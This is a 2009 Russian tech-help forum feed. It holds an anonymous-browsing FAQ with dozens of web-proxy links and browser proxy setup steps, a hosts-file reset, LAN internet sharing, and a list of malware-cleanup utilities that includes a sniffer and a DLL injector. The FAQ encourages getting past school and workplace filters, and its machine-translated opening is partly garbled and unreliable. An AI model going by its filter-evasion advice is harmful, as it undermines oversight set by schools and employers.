<p>Небольшой FAQ </p> <p>Что такое анонимный серфинг? </p> <p>Анонимный просмотр просто просмотра World Wide Web с большинством ваших личных скрыт. Это делается главным образом на основе так называемого анонимного прокси на основе браузера. Эти веб-сайты, которые можно использовать для ввода адреса веб-страницы, которую вы хотели бы посетить, и услуга будет вам, что веб-сайт с информацией, таких, как местоположение компьютера и IP-адрес скрыт от веб-страницы. Например, когда пользователь пытается получить доступ к кое-что на определенной части Интернета, прокси-сервер будет говорить на этот файл в качестве посла на пользователя, обеспечивая конфиденциальность пользователя. Практика анонимного просмотра можно также сохранить конфиденциальность пользователей от потенциальных лесозаготовителей шпионажа пользователя соединение. </p> <p>Эффективность Анонимный просмотр </p> <p>Как анонимный просмотр также позволяет пользователю обхода ограничений, установленных в интернет-соединения, такие, как простой брандмауэр, оно широко используется техника. Это особенно часто используется в школах и отделениях, где Существуют ограничения на тяжелых веб-страниц, которые являются и не являются доступными. Студенты анонимно просматривать чтобы получить доступ к социальной сети сайтов заблокирован школы тек офиса, которые считаются сайты, как вредные для студентов. Офисные работники также анонимно просматривать, как это может помочь им в обход ограничений, установленных работодателями, или не оставляют каких-либо треков в том случае, если работодатели контроля за их использованием Интернета. </p> <p>Риски Что Анонимный просмотр </p> <p>Хотя анонимный просмотр, как представляется, решение полной анонимности, он может быть вредным. Это объясняется тем, что со стороны пользователя анонимно просмотра, они, используя анонимные прокси-сервера, который не шифрует данные, когда она направляется на прокси-сервере. Таким образом, важной информации, такой как логины, пароли и номера кредитных карт могут быть зарегистрированы и утечка на прокси-сервер администратора, который имеет опасный план. Пользователи, которые постоянно в поиске анонимно Люди также могут попасть Интернет ловушки, где отображение веб-страниц неправильно меры безопасности, в котором пользователь может верить и давать слишком много информации. Это может привести к еще большей катастрофы, чем неанонимный просмотра, так как прокси-сервер сам и любой прокси цепей при том, что прокси-сервер может видеть все, что пользователь информации. </p> <p>Возможности для поиска в Web Proxy Service для анонимный серфинг </p> <p>Хороший веб-прокси сервиса будет настроить SSL и TLS туннель с анонимным серфингом. Это позволит предотвратить сети сниферов от прослушивания на лицо, анонимный серфинг. </p> <p>Некоторые прокси серверы поддержка FTP, в то время как другие только поддержку HTTP. Некоторые, но не все анонимные прокси-серверы поддержки HTTPS. Убедитесь в том, чтобы выбрать анонимные прокси-сервера, которые поддерживают протоколы вы хотите использовать. </p> <p>В дополнение к скрывая ваш IP адрес анонимного прокси-сервера, как правило, устранить движения, такие, как: <br />Печенье <br />Скрипты <br />Всплывающие окна <br />Баннеры <br />Реферер информации </p> <p>Эти варианты должны быть настраивается на конечного пользователя, с тем чтобы к прокси-сервер для работы с веб-сайтами, которые требуют печенье или всплывающие окна. </p> <p>(c) гдет... </p> <p>Решил выложить сайты для анонимного серфинга по интернету. <br />Собрано со всего простора интернета. <br />Пользуйтесь. </p> <p><a href="http://proxy.3dn.ru/" rel="nofollow" target="_blank">http://proxy.3dn.ru/</a> <br /><a href="http://www.kproxy.com/" rel="nofollow" target="_blank">http://www.kproxy.com/</a> <br /><a href="http://www.645.cc/" rel="nofollow" target="_blank">http://www.645.cc/</a> <br /><a href="http://www.474.cc/" rel="nofollow" target="_blank">http://www.474.cc/</a> <br /><a href="http://www.anonymization.net/" rel="nofollow" target="_blank">http://www.anonymization.net/</a> <br /><a href="http://www.guardster.com/" rel="nofollow" target="_blank">http://www.guardster.com/</a> <br /><a href="http://www.proxyweb.net/" rel="nofollow" target="_blank">http://www.proxyweb.net/</a> <br /><a href="http://webwarper.net/" rel="nofollow" target="_blank">http://webwarper.net/</a> <br /><a href="http://megaproxy.com/" rel="nofollow" target="_blank">http://megaproxy.com/</a> <br /><a href="http://amegaproxy.com/" rel="nofollow" target="_blank">http://amegaproxy.com/</a> <br /><a href="http://www.w3privacy.com/" rel="nofollow" target="_blank">http://www.w3privacy.com/</a> <br /><a href="http://www.anonymizer.ru/" rel="nofollow" target="_blank">http://www.anonymizer.ru/</a> <br /><a href="http://www.the-cloak.com/" rel="nofollow" target="_blank">http://www.the-cloak.com/</a> <br /><a href="http://proxify.com/" rel="nofollow" target="_blank">http://proxify.com/</a> <br /><a href="http://www.snoopblocker.com/" rel="nofollow" target="_blank">http://www.snoopblocker.com/</a> <br /><a href="http://www.long999.com/" rel="nofollow" target="_blank">http://www.long999.com/</a> <br /><a href="http://www.calcmaster.net/" rel="nofollow" target="_blank">http://www.calcmaster.net/</a> <br /><a href="http://www.idzap.com/" rel="nofollow" target="_blank">http://www.idzap.com/</a> <br /><a href="http://www.goproxing.com/" rel="nofollow" target="_blank">http://www.goproxing.com/</a> <br /><a href="http://www.merletn.org/anonymizer" rel="nofollow" target="_blank">http://www.merletn.org/anonymizer</a> <br /><a href="http://www.proxymouse.com/" rel="nofollow" target="_blank">http://www.proxymouse.com/</a> <br /><a href="http://www.proxywave.com/" rel="nofollow" target="_blank">http://www.proxywave.com/</a> <br /><a href="http://www.vtunnel.com/" rel="nofollow" target="_blank">http://www.vtunnel.com/</a> <br /><a href="http://www.freeproxy.ca/" rel="nofollow" target="_blank">http://www.freeproxy.ca/</a> <br /><a href="http://www.hackingtruths.org/proxy" rel="nofollow" target="_blank">http://www.hackingtruths.org/proxy</a> <br /><a href="http://xanproxy.be/" rel="nofollow" target="_blank">http://xanproxy.be/</a> <br /><a href="http://www.proxyanon.com/" rel="nofollow" target="_blank">http://www.proxyanon.com/</a> <br /><a href="http://www.anonproxy.info/" rel="nofollow" target="_blank">http://www.anonproxy.info/</a> <br /><a href="http://www.proxysafe.com/" rel="nofollow" target="_blank">http://www.proxysafe.com/</a> <br /><a href="http://www.strongproxy.com/" rel="nofollow" target="_blank">http://www.strongproxy.com/</a> <br /><a href="http://surfonym.com/" rel="nofollow" target="_blank">http://surfonym.com/</a> <br /><a href="http://www.browseatwork.com/" rel="nofollow" target="_blank">http://www.browseatwork.com/</a> <br /><a href="http://www.anonymousurfing.info/" rel="nofollow" target="_blank">http://www.anonymousurfing.info/</a> <br /><a href="http://www.browsingwork.com/" rel="nofollow" target="_blank">http://www.browsingwork.com/</a> <br /><a href="http://www.anotherproxy.com/" rel="nofollow" target="_blank">http://www.anotherproxy.com/</a> <br /><a href="http://www.proxifyme.com/" rel="nofollow" target="_blank">http://www.proxifyme.com/</a> <br /><a href="http://www.unblockthis.com/" rel="nofollow" target="_blank">http://www.unblockthis.com/</a> <br /><a href="http://www.hidingyou.com/" rel="nofollow" target="_blank">http://www.hidingyou.com/</a> <br /><a href="http://www.fsurf.com/" rel="nofollow" target="_blank">http://www.fsurf.com/</a> <br /><a href="http://www.proxy-surf.net/" rel="nofollow" target="_blank">http://www.proxy-surf.net/</a> <br /><a href="http://www.totalupload.com/surf/" rel="nofollow" target="_blank">http://www.totalupload.com/surf/</a> <br /><a href="http://www.arandomproxy.com/" rel="nofollow" target="_blank">http://www.arandomproxy.com/</a> <br /><a href="http://proxynanny.com/" rel="nofollow" target="_blank">http://proxynanny.com/</a> <br /><a href="http://www.anoniproxy.com/" rel="nofollow" target="_blank">http://www.anoniproxy.com/</a> <br /><a href="http://pleaseunblock.com/" rel="nofollow" target="_blank">http://pleaseunblock.com/</a> <br /><a href="http://www.proxylord.com/" rel="nofollow" target="_blank">http://www.proxylord.com/</a> <br /><a href="http://www.proxyindex.com/" rel="nofollow" target="_blank">http://www.proxyindex.com/</a> <br /><a href="http://www.surf-anonymous.org/" rel="nofollow" target="_blank">http://www.surf-anonymous.org/</a> <br /><a href="http://www.privacy-world.com/" rel="nofollow" target="_blank">http://www.privacy-world.com/</a> <br /><a href="http://www.surf24h.com/" rel="nofollow" target="_blank">http://www.surf24h.com/</a> <br /><a href="http://bywhat.com/" rel="nofollow" target="_blank">http://bywhat.com/</a> <br /><a href="http://gothru.info/" rel="nofollow" target="_blank">http://gothru.info/</a> <br /><a href="http://www.openupms.com/" rel="nofollow" target="_blank">http://www.openupms.com/</a> <br /><a href="http://www.stupidschool.com/" rel="nofollow" target="_blank">http://www.stupidschool.com/</a> <br /><a href="http://www.ianonymous.info/" rel="nofollow" target="_blank">http://www.ianonymous.info/</a> <br /><a href="http://viewtheweb.info/" rel="nofollow" target="_blank">http://viewtheweb.info/</a> <br /><a href="http://openblockers.info/" rel="nofollow" target="_blank">http://openblockers.info/</a> <br /><a href="http://dontbestopped.info/" rel="nofollow" target="_blank">http://dontbestopped.info/</a> <br /><a href="http://www.proxy4myspace.org/" rel="nofollow" target="_blank">http://www.proxy4myspace.org/</a> <br /><a href="http://www.freedomtunnel.info/" rel="nofollow" target="_blank">http://www.freedomtunnel.info/</a> <br /><a href="http://privatebrowse.info/" rel="nofollow" target="_blank">http://privatebrowse.info/</a> <br /><a href="http://getonnow.info/" rel="nofollow" target="_blank">http://getonnow.info/</a> <br /><a href="http://freemyurl.info/" rel="nofollow" target="_blank">http://freemyurl.info/</a> <br /><a href="http://bypasslocks.info/" rel="nofollow" target="_blank">http://bypasslocks.info/</a> <br /><a href="http://www.noipproxy.com/" rel="nofollow" target="_blank">http://www.noipproxy.com/</a> <br /><a href="http://www.myinternetproxy.com/" rel="nofollow" target="_blank">http://www.myinternetproxy.com/</a> <br /><a href="http://www.surfinstantly.info/" rel="nofollow" target="_blank">http://www.surfinstantly.info/</a> <br /><a href="http://worldwideunblocker.info/" rel="nofollow" target="_blank">http://worldwideunblocker.info/</a> <br /><a href="http://www.iproxy.eu/" rel="nofollow" target="_blank">http://www.iproxy.eu/</a> <br /><a href="http://www.blairstownnj.org/" rel="nofollow" target="_blank">http://www.blairstownnj.org/</a> <br /><a href="http://bypassway.net/" rel="nofollow" target="_blank">http://bypassway.net/</a> <br /><a href="http://289.us/" rel="nofollow" target="_blank">http://289.us/</a> <br /><a href="http://browsebrisk.com" rel="nofollow" target="_blank">http://browsebrisk.com</a> <br /><a href="http://browsecrafty.com" rel="nofollow" target="_blank">http://browsecrafty.com</a> <br /><a href="http://hidden4u.com" rel="nofollow" target="_blank">http://hidden4u.com</a> <br /><a href="http://planetx5.com" rel="nofollow" target="_blank">http://planetx5.com</a> </p> <p>Попутно если достали Проксики то настроить их: </p> <p>1. Настройка веб-прокси в Internet Explorer <br />2. Откройте Internet Explorer. <br />3. Откройте меню &lt;Tools&gt;. <br />4. Выберите &lt;Internet options&gt;. <br />5. Перейдите на вкладку &lt;Connections&gt;. <br />6. Нажмите на кнопку &lt;LAN Settings&gt;. <br />7. Установите флажок &quot;Использовать прокси-сервер для подключений LAN&quot;. <br />8. Введите IP-адрес прокси-сервера вы выбрали в шаге 1, в поле &quot;Адрес:&quot; коробка. <br />9. Введите номер порта прокси-сервера вы выбрали в шаге 1 в &quot;Порт:&quot; коробка. <br />10. Нажмите кнопку &lt;OK&gt;. <br />11. Нажмите кнопку &lt;OK&gt;. </p> <p>Настройка веб-прокси в Mozilla Firefox </p> <p>1. Откройте Firefox. <br />2. Откройте меню &lt;Tools&gt;. <br />3. Выберите &lt;Options&gt;. <br />4. Нажмите кнопку &lt;Connection Settings&gt;. <br />5. Проверьте &lt;Manual прокси Configuration&gt;. <br />6. Введите IP-адрес прокси-сервера вы выбрали в шаге 1, в &quot;HTTP-прокси:&quot; коробка. <br />7. Введите номер порта прокси-сервера вы выбрали в шаге 1, в соответствующих &quot;Порт:&quot; коробка. <br />8. Введите IP-адрес прокси-сервера вы выбрали в шаге 1 в &quot;SSL-прокси:&quot; коробка. <br />9. Введите номер порта прокси-сервера вы выбрали в шаге 1, в соответствующих &quot;Порт:&quot; коробка. <br />10. Нажмите кнопку &lt;OK&gt;. <br />11. Нажмите кнопку &lt;OK&gt;. </p> <p>Настройка веб-прокси в Opera <br />1. В главном меню выбираем &quot;Tools&quot;, подменю &quot;Preferences&quot; <br />2. В новом окне с вертикальным меню слева выбираем &quot;Network&quot;, в появившейся панели справа жмем &quot;Proxy servers&quot; <br />3. В следующем появившемся окне отмечаем галочками необходимые нам протоколы (можна все, но наиболее критичен к трафику обычно HTTP протокол. <br />В строку адреса вводим proxy <br />4. Давим &quot;Apply&quot;, &quot;OK&quot;, возвращаемся к исходному окну браузера.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 03:18:08 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=33#p33 http://sapog.forumbb.ru/viewtopic.php?pid=32#p32 <p>Т.к. часто появляются темы с таким вопросом, опишем один из вариантов решения проблемы. </p> <p>Открываете блокнотом файл &quot;C:\WINDOWS\system32\drivers\etc\hosts&quot; <br />Находите строку &quot;127.0.0.1 localhost&quot; и удаляете все строки после нее. <br />Сохраняете. <br />Закрываете браузер (если он был открыт). <br />Открываете браузер и пробуете открыть сайт, который был недоступен. </p> <p>Если не помогло можете задать вопрос здесь. <br />Но перед этим открываете &quot;Пуск&quot; -&gt; &quot;Выполнить&quot; -&gt; вводите команду &quot;cmd&quot; -&gt; нажимаете &quot;Enter&quot;. <br />В открывшейся командной строке вводите &quot;ping адрес_сайта&quot; -&gt; нажимаете &quot;Enter&quot; (например &quot;ping wwwdrweb.ru&quot;) </p> <p>В данном случае результат выполнения команды ping выглядит так:</p><div class="quote-box quote-main"><blockquote><p>C:\&gt;ping wwwdrweb.ru </p> <p>Обмен пакетами с wwwdrweb.ru [87.242.72.150] с 32 байтами данных: &lt;&lt;&lt;&lt;&lt; --- здесь IP-адрес <br />Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 <br />Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 <br />Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 <br />Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 </p> <p>Статистика Ping для 87.242.72.150: <br />Пакетов: отправлено = 4, получено = 4, потеряно = 0 <br />(0% потерь) <br />Приблизительное время приема-передачи в мс: <br />Минимальное = 90мсек, Максимальное = 90 мсек, Среднее = 90 мсек </p> <p>C:\&gt;</p></blockquote></div><p>В вопросе укажите результат выполнения команды, можно просто написать пингуемый IP-адрес (выделен выше жирным).</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 03:16:44 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=32#p32 http://sapog.forumbb.ru/viewtopic.php?pid=31#p31 <p>Поскольку данный процедура, вроде достаточно простая, вызывает много вопросов, то, пожалуй, тема будет полезна. Начинаем с простого. </p> <p>Как настроить интернет на несколько компьютеров в локальной сети (для чайников). </p> <p>Вариант первый: adsl-модем настроен в режим роутера. <br />Для того, чтобы компьютеры в локальной сети имели доступ в интернет, достаточно просто указать IP-адрес модема в качестве основного шлюза в настройках сетевого соединения. <br />Пуск – Панель управления – Сетевые подключения – Подключение по локальной сети, Свойства, закладка Общие – Протокол Интернета (TCP/IP). <br />Интернет будет работать одновременно на всех компьютерах. </p> <p>Вариант второй: adsl-модем в режиме brige. <br />Для начала нужно подключить к интернету тот компьютер, который будет служить шлюзом для всех остальных. Создаем соединение, жмем кнопку Свойства, на закладке Дополнительно отмечаем галкой пункт «Разрешить пользователям сети использовать подключение к Интернету данного компьютера». <br />На всех остальных компьютерах в настройках сетевого подключения указываем в качестве основного шлюза адрес этого компьютера. <br />Интернет в этом случае будет работать на остальных компьютерах, когда установлено соединение на шлюзе. </p> <p>Для тех, кого интересует настройка сети в Vista, весьма подробное описание: Настройка сети в Windows Vista. </p> <p>Для начала хватит. Если надо – дополню скринами, для тех кто совсем на танке. Если нужно сделать подробнее – пишем сюда. <br />Фак будет дополнятся описанием различных ситуаций и вопросов касательно общего доступа к интернет в локальной сети, проводной или wi-fi. Заявки и пожелания о том, что стоит добавить, пишем здесь либо в личку.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 03:14:57 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=31#p31 http://sapog.forumbb.ru/viewtopic.php?pid=30#p30 <p>Люди спорят о чём угодно и об антивирусах тоже. <br />Можно спорить об их нужности до усрачки. <br />Но, платить за них - это надо быть <span style="color: red"><span style="font-size: 16px">голимым конченым идиотом</span></span>.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 03:11:47 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=30#p30 http://sapog.forumbb.ru/viewtopic.php?pid=29#p29 <p>На форуме часто появляются вопросы как и чем удалить и обнаружить вирус/троян/келогер/руткит и пр. </p> <p>Решил выложить подборку программ которая не раз выручала. </p> <p>Autorun 9.12 <br />Позволяет просканиривать и редактировать практически весь автозапуск <br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" rel="nofollow" target="_blank">http://technet.microsoft.com/en-us/sysi &#8230; 63902.aspx</a> </p> <p>FileMon for Windows v7.04 <br />Позволяет отслеживать обращения всех процессов к файловой системе <br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx" rel="nofollow" target="_blank">http://technet.microsoft.com/en-us/sysi &#8230; 96642.aspx</a> </p> <p>RegMon for Windows v7.04 <br />Позволяет отслеживать обращения всех процессов к реестру <br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb896652.aspx" rel="nofollow" target="_blank">http://technet.microsoft.com/en-us/sysi &#8230; 96652.aspx</a> </p> <p>Rootkit Unhooker LE 3.8.340.550 <br />На данный момент самый лучший антируткит <br /><a href="http://dump.ru/file_catalog/1006853" rel="nofollow" target="_blank">http://dump.ru/file_catalog/1006853</a> </p> <p>RemoteDLL 1.3 <br />позволяет подгружать и выгружать библиотеки из процессов <br /><a href="http://www.securityxploded.com/remotedll.php" rel="nofollow" target="_blank">http://www.securityxploded.com/remotedll.php</a> </p> <p>Advanced Process Termination v4.2 - DiamondCS <br />Наверное лучший убийца процессов, позволяет это делать различными способами <br /><a href="http://dump.ru/file_catalog/1006872" rel="nofollow" target="_blank">http://dump.ru/file_catalog/1006872</a> </p> <p>WinServiceManager <br />Удобный менеджер служб Windows <br /><a href="http://www.securityxploded.com/winservicemanager.php" rel="nofollow" target="_blank">http://www.securityxploded.com/winservicemanager.php</a> </p> <p>0x4553-Intercepter <br />Сниффер сетевой активности <br /><a href="http://intercepter.nerf.ru/" rel="nofollow" target="_blank">http://intercepter.nerf.ru/</a> </p> <p>Process Monitor v1.37 <br />Отличная замена TaskManager, с возможность построения дерева процессов <br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx" rel="nofollow" target="_blank">http://technet.microsoft.com/en-us/sysi &#8230; 96645.aspx</a> </p> <p>Антивирусная утилита AVZ - 4.30 <br /><a href="http://z-oleg.com/secur/avz/download.php" rel="nofollow" target="_blank">http://z-oleg.com/secur/avz/download.php</a> </p> <p>FileAlyzer© 1.6.0.4 <br />Инструмент для просмотра и анализа содержимого файлов <br />Включая файловые потоки!!! <br /><a href="http://www.safer-networking.org/files/filealyz.exe" rel="nofollow" target="_blank">http://www.safer-networking.org/files/filealyz.exe</a> </p> <p>mst IsUsedBy <br />маленькая утилитка котороя позволяет узнать каким процессом занят файл <br /><a href="http://dump.ru/file_catalog/1006913" rel="nofollow" target="_blank">http://dump.ru/file_catalog/1006913</a> </p> <p>Unlocker 1.8.7 <br />позволяет удалить заблокированные (используемые) файлы <br />[link=http://ccollomb.free.fr/unlocker/#download]http://ccollomb.free.fr/unlocker/#download[/link] <br /><span style="color: red"><span style="font-size: 20px">(Если ссылки не работают то к братику гуглу все!! :) )</span></span></p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 03:09:08 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=29#p29